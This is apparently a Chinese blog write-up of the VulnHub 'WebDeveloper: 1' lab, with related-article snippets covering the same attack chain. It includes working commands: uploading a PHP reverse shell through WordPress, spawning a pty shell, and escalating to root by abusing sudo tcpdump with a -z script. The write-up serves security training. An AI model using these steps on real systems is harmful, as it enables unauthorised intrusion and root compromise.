WebDeveloper:1靶机

最新推荐文章于 2024-10-01 16:35:38 发布
最新推荐文章于 2024-10-01 16:35:38 发布
阅读量388 收藏 3
点赞数 8
文章标签: android chrome 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65285254/article/details/141197682
版权

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh webdeveloper@192.168.153.158

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

m0_65285254
关注
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 264
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1022
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
【vulnhub】WebDeveloper:1靶机
wbplife的博客
08-11 405
把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先,输入如下命令查找php-reverse-shell.php的位置。
WebDeveloper:1靶机渗透测试
weixin_58786230的博客
08-14 547
【代码】WebDeveloper:1靶机渗透测试。
【Vulnhub靶机WEB DEVELOPER: 1
所有文章均免费阅读,大家一起学习
07-04 307
然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php。将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码。结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了。用找到的用户名密码登录wordpress,登录成功。查看webdeveloper用户的sudo命令\。查看一下网站根目录下面的文件。发现开放的端口有22 80。
vulnhub Web Developer: 1
箭雨镜屋
01-02 1961
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 976
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1949
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
小白的靶机VulnHub-Web Developer
热门推荐
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
获取靶机Web Developer 文件/root/flag.txt中flag
qq_49085383的博客
12-07 2602
实验四文章目录前言1、发现目标 ,找到WebDeveloper的IP地址2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况3、若目标主机提供了HTTP服务,尝试利用浏览器访问目录4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan,简要说明其功能。6、使用 Dirb 爆破网站目录7、浏览器访问该目录(路径),发现一个cap文件8、利用Wireshark分析该数据包9、利用上一步得到的信息进入网站后台10、利用该CMS存在的(插件Plugin)漏洞,获得账号密码利用文件管理插件
vulnhub - webdeveloper考点:(信息搜集&wireshark&wordpress漏洞&linux tcpdump提权)
冬萍子癸水
04-23 361
https://www.vulnhub.com/entry/web-developer-1,288/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了。。 nmap看到80,22 80当然是web里搜集信息,22要想到可能会ssh登录。。 进去看到是WordPress博客,要想到wpscan扫它,扫出了用户,不过没有太亮眼的其他发现。 dirbuster之类的扫目录,发现登录框。。...
Android 14源码分析】WMS-窗口显示-流程概览与应用端流程分析
隔壁小王的博客
09-30 943
WMS 负责管理设备上所有的 Window ,所以应用想显示一个 Window 则要通过 WMS 来完成。而 WMS 毕竟还是上层,窗口的内容要显示到屏幕上,还需要 SurfaceFlinger 来处理。应用端: 控制其内部的窗口的添加及 UI 绘制逻辑WMS 模块: 作为系统窗口管理模块,处理应用端的窗口显示逻辑应用端与 WMS 通信通过匿名 Binder -> Session 完成。
技术速递|适用于 .NET 和 .NET MAUI Android 应用程序的 Android 资产包
MicrosoftReactor的博客
09-27 1338
早在 2018 年,Google 就推出了一种新的软件包格式,用于将 Android 应用程序部署到 Google Play Store。自 .NET 6 以来,.NET Android 就一直支持Android App Bundles (AAB)这种新格式。Android App Bundles 有很多功能,我们优先考虑了开发人员最需要的功能。AAB 格式的一项高级功能是资产包,它现在将成为 .NET 9 的一部分。那么什么是资产包呢?新软件包格式的一部分是可以将资产放入单独的软件包中。
Android build子系统(01)Ninja构建系统解读
wangdsh的博客
09-29 1050
说明:本文将解读Ninja构建系统,这是当前Android Framework中广泛使用的构建工具。我们将从Ninja的起源和背景信息开始,逐步解读Ninja的优势和核心原理,并探讨其一般使用场景。然后介绍其在Android Framework中的应用及相关工具:kati、soong、gn等,最后介绍下如何自行构建一个Ninja编译系统,以便于对Ninja有一个完整的了解。
Android常用C++特性之std::unique
Android-Graphics&Display
09-27 412
你可以通过提供自定义的谓词来定义 "相等" 的标准。// 使用自定义谓词来移除相邻绝对值相等的元素});// 使用 erase 减少容器大小// 打印结果return 0;是一个用于移除相邻重复元素的算法。它通过重新排列容器中的元素,将不需要的重复元素移动到末尾,并返回新的末尾位置。如果想要实际移除元素,需要结合erase函数。如果容器中存在非相邻的重复元素,通常需要先使用std::sort对容器进行排序。
Android Camera2 与 Camera API技术探究和RAW数据采集
最新发布
乐学吧
10-01 1480
Android Camera2 API 是从 Android 5.0(Lollipop)开始引入的,相对Camera API,优势非常明显,如果需要通过Android平台采集视频数据,在设备支持的前提下,建议尽可能用Camera2做数据采集。
Android Compose的基本使用
赵星海的博客
09-29 440
Compose这个东西呢,好处我没发现,坏处就是学习成本和低版本兼容.不过,看在官方力推的份儿上,有空就学一下吧.当初的kotlin,很多人说鸡肋(包括我)!现在不也咔咔用纯kotlin做项目吗?哈哈哈哈.未来的事情,谁说得清呢?1.简单的View排列放置以及基础属性2.View的事件监听和事件传递(如点击事件,输入事件)3.View的数据动态赋值(直接改变数据,UI自动改变) (数据必须由remember代理)) {Column { //竖向布局。
CTF实践:渗透测试WebDeveloper靶机
"网络渗透实验四 - CTF实践,通过Kali Linux对WebDeveloper靶机进行渗透测试,学习CTF竞赛中的MISC、PPC、WEB等知识,增强信息收集和团队协作能力,掌握网络扫描、目录枚举、提权等技能。" 本实验主要涉及以下知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值